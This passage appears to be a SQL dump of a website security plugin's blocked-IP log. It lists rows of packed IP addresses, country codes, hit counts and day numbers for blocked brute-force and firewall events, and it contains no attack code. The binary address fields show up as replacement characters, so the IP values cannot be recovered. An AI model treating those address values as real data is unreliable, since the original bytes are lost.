g','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���� g','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����\ZP','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����\ZP','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����F+','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����Z�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���㪽','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���㪽','DE',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���㪽','DE',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����N','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����N','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���贮','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���贮','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���贮','IN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���>|�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���>}�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���>}�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���>}�','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���>}�','US',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���>}�','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���G?/','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���GY\\','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���GY\\','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gf','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Go','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���Go','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���GȽ','SG',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�k','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�%','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gڿ','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�','IN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�','IN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���VBe','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���VE3','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���VE3','DE',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vw�','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vw�','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vw�','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vw�','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���V|�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���V|�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���V|�','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���c/','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���c/','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���c/','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���c/','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���c9','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���c9','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���c9','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���c6','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���cD�','SG',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���c]�','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���c]�','GB',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���c]�','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���cr5','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���cr5','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���cr5','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�X','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�X','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�X','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0����8$','GB',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����8$','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����8','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���w8*','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ҝ4','AR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���*','IR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����M','SE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','VN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','VN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����2<','VN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���R�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���R�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����\\','US',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����9�','CA',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����s','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����s','DE',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���쬺','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����\n','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����d','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����q','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����t','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����t','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����t','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����}','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���츈','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����8\Z','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����8\Z','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����ʰ','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����p�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����*','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����y','CN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��� F�','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�','RU',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0����؛','TR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����؛','TR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����؛','TR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����؛','TR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n�u','BR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�','BR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�i','BR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�i','BR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o','BR',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o','BR',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o','BR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o','BR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o','BR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���7pm','BR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���I�-','BR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���I�-','BR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���I�-','BR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ue/','BR',4,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���> z','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���> z','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���>!�','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L�','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L�','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L�','GB',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0���>M�','GB',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���>n�','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���>n�','GB',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���>n�','GB',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���>n�','GB',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���?g�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����*}','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����3�','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����6�','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����6�','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����6�','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����>�','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����Dy','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����aM','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����aM','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����q�','SG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����q�','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����q�','SG',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0����q�','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����g','SG',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����8','GB',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����8','GB',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0�����z','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����@�','UA',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����@�','UA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����*J','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����*J','FR',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����*J','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���ҥ�','TR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���l��','BR',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���M','BR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���M','BR',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','ID',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����E','ID',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����E','ID',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','MO',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','MO',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','MO',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����`�','BD',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�_','TH',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����~�','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����~�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���!','IT',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���!','IT',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���,','IT',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���G','IT',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�','GB',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�','GB',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����r','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���!6','HU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���)��','PL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���.x�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���.yB','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���.{*','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���1L','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���1N','FR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���1N','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���1N','FR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���26','RU',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���26','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���2��','ES',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���2��','ES',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�:','IR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�:','IR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���3�:','IR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���;,','TR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���=�M','GB',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���?�:','RU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','UA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�','UA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q`','IR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q`','IR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q`','IR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q`q','IR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���VM�','UA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���VM�','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���VM�','UA',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vҳ','ES',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���W��','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�$','IR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�$','IR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���b�','KZ',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���h,5','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���h,q','UA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���h��','RU',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���h��','RU',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���k/�','NL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���yQ�','KZ',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���zɁ','TR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���zɁ','TR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����C','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����C','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����t\r','IR',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����t\r','IR',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0����-%','RU',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����9d','NL',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RO',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RO',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RO',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RO',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����z�','BY',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����w!','PL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����w.','PL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����\'B','',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����\'B','',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����4�','RO',4,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����d�','DE',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����d�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����e','DE',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����e','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����e','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����e','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','DE',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','TR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����Iz','PL',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����<','IR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����<','IR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',1,18857,'waf'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',16,18873,'waf'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r','CL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r#','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@r<','CL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���@rP','CL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���@rP','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@rn','CL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���@sP','CL',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���@tA','CL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���@tA','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@tA','CL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���@tU','CL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���@t�','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u_','CL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u}','CL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u}','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u�','CL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���@u�','CL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v7','CL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v7','CL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v�','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v�','CL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���@v�','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@wP','CL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w}','CL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w}','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w�','CL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@w�','CL',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����P','BR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����PC','BR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����P�','BR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���3','BR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�[','IR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���\"�r','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���(%�','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���(%�','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���(%�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���(%�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�_','PT',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����d','UZ',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����?�','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����?�','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���� ','NL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���� ','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����8�','NL',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����^�','NL',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����դ','SG',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RU',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����','GB',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����','GB',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���k��','CL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���ࣶ